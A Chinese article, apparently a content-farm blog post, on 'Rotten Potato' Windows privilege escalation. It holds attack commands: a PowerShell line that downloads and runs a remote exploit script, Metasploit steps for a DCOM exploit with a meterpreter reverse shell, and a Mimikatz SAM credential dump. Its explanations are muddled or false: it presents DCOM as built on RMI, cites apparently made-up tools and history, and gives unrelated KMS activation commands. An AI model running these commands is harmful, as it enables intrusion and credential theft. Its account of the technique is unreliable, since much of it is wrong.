一、烂土豆提权原理
烂土豆提权是一种利用Windows系统漏洞获得系统管理员权限的技术手段。它利用了Windows操作系统上DCOM服务(分布式组件对象模型)的一个漏洞,通过改写注册表数据,然后构造数据包,远程执行程序,从而获得系统管理员权限的攻击方法。
实际上,利用DCOM服务的漏洞来提权的方式并不是烂土豆提权这个家族首创的,早在2003年,俄罗斯黑客d_know通过分析Windows XP漏洞,利用dcomcnfg.exe,注入dll文件,最终获得了管理员权限,这也是最早的DCOM提权攻击。
二、哥斯拉 土豆提权
哥斯拉土豆提权(Godzilla Potato)是烂土豆提权家族的一员,在烂土豆提权的基础上,进一步提高了攻击的成功率。哥斯拉土豆提权利用了Windows操作系统会自动查找可用代理的功能。攻击者可以利用一个特殊的代理服务器来干扰这一功能,从而让Windows选择攻击者控制的代理服务器,实现提权。
三、烂土豆提权命令
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS16-032/ms16-032_Kernel_Pool.html') msfconsole use exploit/windows/dcerpc/ms03_026_dcom set RHOST IPADDR set PAYLOAD windows/meterpreter/reverse_tcp exploit
四、烂土豆提权工具
烂土豆提权最为经典的工具当然是metasploit,而Black-hole的“魔改工具”也比较实用,它加入了多线程功能提高了攻击成功率。但是由于这些工具可能会被杀软拦截,攻击者可以使用一些威力更小的轻量级工具,例如GadgetToJScript、PowerSploit等。
五、烂土豆提权的原理详解
烂土豆提权所利用的漏洞源自于Windows RMI(远程方法调用)机制的实现方式。由于Windows系统默认启用了DCOM服务,而DCOM协议基于RMI,因此这两者之间常常会出现安全漏洞。攻击者可以通过RMI注册表的许多漏洞之一来攻击Windows系统登入。
六、土豆提权原理
烂土豆提权是土豆提权的一种变体,但它与其他土豆提权方法不同,它利用的是Windows系统不严密的RPC(远程过程调用)实现方式。攻击者可以通过RPC服务,对Windows操作系统全面地进行操控,例如枚举本地口令哈希、执行远程代码等。
七、土豆家族提权
土豆家族提权实际上是土豆提权的进一步延伸,因为它包括了非常多的利用Windows系统漏洞的攻击方式。例如,Windows操作系统XP、7等版本存在的漏洞,通过利用NTLM哈希也可以成功提权。因此,土豆家族提权也成为了黑客攻击Windows操作系统的重要兵器。
八、土豆提权利用dcom提权的
cscript C:\windows\system32\slmgr.vbs /skms ip(攻击者ip) cscript C:\windows\system32\slmgr.vbs /ato 4、 mmc.exe -Filepath C:\windows\system32\compmgmt.msc -windows下Component Services --计算机 ---DCOM ----combrok ------属性 -------常规 --------下面的"Rpc工厂:允许远程服务器的RPC" powershell Import-Module .\Mimikatz.ps1 invoke-mimikatz "lsadump::sam" “exit”
原创文章,作者:小蓝,如若转载,请注明出处:https://www.506064.com/n/228831.html